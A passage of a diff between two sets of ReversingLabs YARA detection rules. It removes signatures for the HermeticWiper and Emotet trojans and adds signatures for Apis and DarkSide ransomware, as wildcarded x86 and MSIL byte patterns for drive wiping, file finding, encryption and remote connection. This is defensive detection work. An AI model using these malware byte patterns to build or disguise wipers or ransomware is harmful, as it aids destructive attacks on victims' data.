?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A + ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 + 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? + 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D + ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A } - $erase_drives_recursively_2_p2 = { - C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? 51 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? E9 ?? - ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? - ?? ?? ?? 73 ?? E9 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? FF 95 ?? ?? ?? - ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 - ?? 6A ?? 6A ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? - 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 95 ?? ?? ?? ?? - 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 55 ?? 8D 8D ?? ?? ?? - ?? 51 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 50 FF 95 ?? ?? ?? ?? 8B E5 5D C3 + $remote_connection_p2 = { + 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 + ?? 8B 06 E8 ?? ?? ?? ?? 99 52 50 8B 45 ?? 03 C7 33 D2 3B 54 24 ?? 75 ?? 3B 04 24 5A + 58 76 ?? EB ?? 5A 58 7E ?? 8B 06 E8 ?? ?? ?? ?? 8B D0 81 C2 ?? ?? ?? ?? 8B C6 E8 ?? + ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 03 C7 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D + ?? 81 FF ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? + 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A + ?? 8B 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? + 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? + ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? + ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 + ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? + ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B + 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8B 06 E8 ?? ?? ?? ?? 99 52 50 + 8B 45 ?? 03 C7 33 D2 3B 54 24 ?? 75 ?? 3B 04 24 5A 58 76 ?? EB ?? 5A 58 7E ?? 8B 06 + E8 ?? ?? ?? ?? 8B D0 81 C2 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 03 + C7 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D ?? 81 FF ?? ?? ?? ?? 77 ?? 83 7D + ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 + } + $encrypt_files = { + 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? + E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 + ?? 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 + ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? + ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? + 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF + 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 + ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? + ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D + ?? ?? 74 } condition: - uint16(0)==0x5A4D and ($destroy_if_not_controller) and ($erase_drive_data) and ( all of ($erase_drives_recursively_*)) + uint16(0)==0x5A4D and ($enum_resources) and ( all of ($find_files_p*)) and ($encrypt_files) and ( all of ($remote_connection_p*)) } -rule REVERSINGLABS_Win32_Trojan_Hermeticwiper : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Apis : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects HermeticWiper trojan." + description = "Yara rule that detects Apis ransomware." author = "ReversingLabs" - id = "252dfb3d-9d4e-51a4-80c9-64e17922d997" - date = "2022-02-24" - modified = "2022-02-24" + id = "63791250-e21e-53d1-932c-9b5d16a7cad9" + date = "2021-11-25" + modified = "2021-11-25" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/trojan/Win32.Trojan.HermeticWiper.yara#L1-L50" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0fa519ce8285ffe4e49c2a301e8a0fd0516a05dc6b41ee0b010fdc76dd6e195e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Apis.yara#L1-L75" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0915469884a268f124da348d6a182eb4a0f69063d4041b46628794ab011227ef" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Trojan" - tc_detection_name = "HermeticWiper" + tc_detection_type = "Ransomware" + tc_detection_name = "Apis" tc_detection_factor = 5 importance = 25 strings: - $corrupt_physical_drive = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 51 68 ?? ?? ?? ?? 0F 57 C0 89 55 ?? 8D 85 ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 66 0F D6 45 ?? 33 FF 89 75 ?? 50 0F - 11 45 ?? 89 7D ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 8D 55 ?? 8D 8D ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? - BF ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 8D 45 ?? - 50 57 56 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? - 75 ?? 66 0F 1F 44 00 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 81 C7 ?? ?? - ?? ?? 33 F6 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 6A ?? 68 ?? - ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 F6 0F 84 ?? ?? ?? - ?? 8B 06 C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? - 83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 55 ?? 8D 46 ?? 89 45 ?? 66 90 - 8B 00 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? - ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? FF 70 ?? FF 70 - ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF - 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 81 FA ?? ?? ?? ?? 72 ?? 66 83 7F ?? - ?? 75 ?? 85 D2 0F B7 C2 B9 ?? ?? ?? ?? 0F 45 C8 66 89 4F ?? 8B 45 ?? FF 70 ?? FF 70 - ?? FF 75 ?? FF 75 ?? 57 53 FF 55 ?? 8B 55 ?? 8B 4D ?? 8B 45 ?? 41 05 ?? ?? ?? ?? 89 - 4D ?? 89 45 ?? 3B 4E ?? 0F 82 ?? ?? ?? ?? 8B 7D ?? EB ?? FF 15 ?? ?? ?? ?? 33 FF 85 - DB 74 ?? 83 FB ?? 74 ?? 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 F6 74 ?? 56 6A ?? - FF D3 8B 35 ?? ?? ?? ?? 50 FF D6 EB ?? FF 15 ?? ?? ?? ?? 8B 7D ?? EB ?? 33 C0 5F 5E - 5B 8B E5 5D C2 ?? ?? 8B 35 ?? ?? ?? ?? 85 FF 74 ?? 57 6A ?? FF D3 50 FF D6 8B 45 ?? - 5F 5E 5B 8B E5 5D C2 + $find_files = { + 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 0A 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 2C ?? 06 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E + 69 32 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? + 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 + ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E + ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? + 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 07 28 ?? ?? + ?? ?? 08 28 ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 + ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? + 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A + } + $encrypt_files = { + 02 28 ?? ?? ?? ?? 0A 17 0B 16 0C 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 06 08 9A 28 + ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 08 9A 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 11 ?? FE 06 ?? ?? + ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 + ?? ?? ?? ?? 06 08 9A 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F + ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 2F ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? + 18 5B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 06 08 9A 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 06 08 9A 06 08 9A 72 ?? ?? ?? ?? 1A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? + 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 1A 5B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 13 ?? 06 08 9A 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 08 9A 06 08 9A 72 ?? ?? ?? ?? 1A + 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 2C ?? 16 0B 02 72 ?? ?? ?? ?? 7E ?? ?? + ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 08 17 58 0C 08 06 8E + 69 3F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ?? + 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 2A + } + $setup_env = { + 28 ?? ?? ?? ?? 2C ?? 17 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? + ?? 2C ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? + ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2B ?? 7E ?? ?? ?? ?? 2C ?? + 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? + 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2D ?? 14 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? + 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? + ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A } condition: - uint16(0)==0x5A4D and ($corrupt_physical_drive) + uint16(0)==0x5A4D and ($setup_env) and ($find_files) and ($encrypt_files) } -rule REVERSINGLABS_Win32_Trojan_Emotet : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Ransomware_Darkside : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Emotet trojan." + description = "Yara rule that detects DarkSide ransomware." author = "ReversingLabs" - id = "9742743d-753a-582b-9701-7278c8ed0e4e" - date = "2021-11-16" - modified = "2021-11-16" + id = "061b00cb-9b70-521f-ab3f-7e6b3c129194" + date = "2021-05-17" + modified = "2021-05-17" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/trojan/Win32.Trojan.Emotet.yara#L1-L182" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "747d603c9849a66782c95050a4a634ffdb4ce2882adcfc5d63e1f1ea1651b25e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.DarkSide.yara#L1-L94" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "128af9a1b143e4b0928dd2b243e69497be906175f44815cc5703f17cce48ec9d" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Trojan" - tc_detection_name = "Emotet" + tc_detection_type = "Ransomware" + tc_detection_name = "DarkSide" tc_detection_factor = 5 importance = 25 strings: - $decrypt_resource_v1 = { - 55 8B EC 83 EC ?? 53 8B D9 8B C2 56 57 89 45 ?? 8B 3B 33 F8 8B C7 89 7D ?? 83 E0 ?? - 75 ?? 8D 77 ?? EB ?? 8B F7 2B F0 83 C6 ?? 8D 0C 36 E8 ?? ?? ?? ?? 8B D0 89 55 ?? 85 - D2 74 ?? 83 65 ?? ?? 8D 43 ?? 83 65 ?? ?? C1 EE ?? 8D 0C B0 8B F2 8B D9 2B D8 83 C3 - ?? C1 EB ?? 3B C1 0F 47 5D ?? 85 DB 74 ?? 8B 55 ?? 8B F8 8B 0F 8D 7F ?? 33 CA 0F B6 - C1 66 89 06 8B C1 C1 E8 ?? 8D 76 ?? 0F B6 C0 66 89 46 ?? C1 E9 ?? 0F B6 C1 66 89 46 - ?? C1 E9 ?? 0F B6 C1 66 89 46 ?? 8B 45 ?? 40 89 45 ?? 3B C3 72 ?? 8B 7D ?? 8B 55 ?? - 33 C0 66 89 04 7A 5F 5E 8B C2 5B 8B E5 5D C3 - } - $generate_filename_v1 = { - 56 57 33 C0 BF ?? ?? ?? ?? 57 50 50 6A ?? 50 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8B F0 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? - ?? 83 C4 ?? 8B CE 5F 5E E9 - } - $decrypt_resource_v2 = { - 55 8B EC 83 EC ?? 8B 41 ?? 8B 11 33 C2 53 56 8D 71 ?? 89 55 ?? 8D 58 ?? 89 45 ?? 83 - C6 ?? F6 C3 ?? 74 ?? 83 E3 ?? 83 C3 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? - 8B C8 E8 ?? ?? ?? ?? FF D0 8D 14 1B B9 ?? ?? ?? ?? 52 6A ?? 50 E8 ?? ?? ?? ?? BA ?? - ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? FF D0 89 45 ?? 85 C0 74 ?? C1 EB ?? 8B C8 57 33 C0 8D - 14 9E 33 DB 8B FA 2B FE 83 C7 ?? C1 EF ?? 3B F2 0F 47 F8 85 FF 74 ?? 8B 16 8D 49 ?? - 33 55 ?? 8D 76 ?? 0F B6 C2 43 66 89 41 ?? 8B C2 C1 E8 ?? 0F B6 C0 66 89 41 ?? C1 EA - ?? 0F B6 C2 66 89 41 ?? C1 EA ?? 0F B6 C2 66 89 41 ?? 3B DF 72 ?? 8B 45 ?? 33 D2 8B - 4D ?? 5F 66 89 14 41 8B C1 5E 5B 8B E5 5D C3 - } - $generate_filename_v2 = { - 55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 51 6A ?? B9 ?? ?? ?? ?? - E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? FF D0 85 C0 0F 88 ?? ?? ?? ?? 56 - B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? 8D [1-5] 51 - 51 50 56 8D [1-5] 68 ?? ?? ?? ?? 51 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B - C8 E8 ?? ?? ?? ?? FF D0 83 C4 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 - E8 ?? ?? ?? ?? FF D0 56 6A ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 - E8 ?? ?? ?? ?? FF D0 B8 ?? ?? ?? ?? 5E 8B E5 5D C3 33 C0 8B E5 5D C3 - } - $decrypt_resource_v3 = { - 56 8B F1 BA [6-9] B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF D0 56 6A ?? 50 68 ?? ?? ?? ?? - BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF D0 5E C3 - } - $generate_filename_v3 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F1 8B FA 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? BB ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? 8D 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B D3 56 50 BE ?? ?? ?? ?? [2-5] 8B CE E8 ?? - ?? ?? ?? 59 FF D0 57 8D 85 ?? ?? ?? ?? 8B D3 50 [2-5] 8B CE E8 ?? ?? ?? ?? 59 FF D0 - 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 - ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 59 FF D0 F7 D8 5F 1B C0 5E 40 5B 8B E5 5D C3 - } - $decrypt_resource_v4 = { - 56 57 8B FA E8 ?? ?? ?? ?? 8B F0 A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? - ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 8B 0D ?? ?? ?? ?? - 89 44 B9 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? - 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF D0 8B F8 A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? - ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 56 6A ?? 57 - FF D0 5F 5E C3 - } - $generate_filename_snippet_v4 = { - A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? - ?? ?? ?? A3 ?? ?? ?? ?? 56 53 FF D0 A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? - ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 5F 5E 33 C9 8D - 04 43 66 89 08 5D 5B 59 C3 - } - $decrypt_resource_snippet_v5 = { - C1 EE ?? 33 C0 55 33 ED 8B D3 8D 0C B7 8B F1 2B F7 83 C6 ?? C1 EE ?? 3B F9 0F 47 F0 - 85 F6 74 ?? 8B 5C 24 ?? 8B 0F 8D 7F ?? 33 CB 0F B6 C1 66 89 02 8B C1 C1 E8 ?? 8D 52 - ?? 0F B6 C0 66 89 42 ?? C1 E9 ?? 0F B6 C1 C1 E9 ?? 45 66 89 42 ?? 0F B6 C1 66 89 42 - ?? 3B EE 72 ?? 8B 5C 24 ?? 8B 44 24 ?? 33 C9 5D 66 89 0C 43 5F 5E 8B C3 5B 83 C4 ?? - C3 - } - $decrypt_resource_snippet_v6 = { - C1 EE ?? 33 C0 55 33 ED 8B D3 8D 0C B7 8B F1 2B F7 83 C6 ?? C1 EE ?? 3B F9 0F 47 F0 - 85 F6 74 ?? 8B 5C 24 ?? 8B 0F 8D 7F ?? 33 CB 88 0A 8B C1 C1 E8 ?? 8D 52 ?? C1 E9 ?? - 88 42 ?? 88 4A ?? C1 E9 ?? 45 88 4A ?? 3B EE 72 ?? 8B 5C 24 ?? 8B 44 24 ?? 5D C6 04 - 03 ?? 5F 5E 8B C3 5B 83 C4 ?? C3 + $find_files_v1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 04 45 ?? ?? ?? + ?? 50 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? + ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? + ?? ?? ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8D 9D ?? ?? + ?? ?? 83 3B ?? 74 ?? 81 3B ?? ?? ?? ?? 74 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8D 85 ?? ?? + ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 7D ?? + ?? 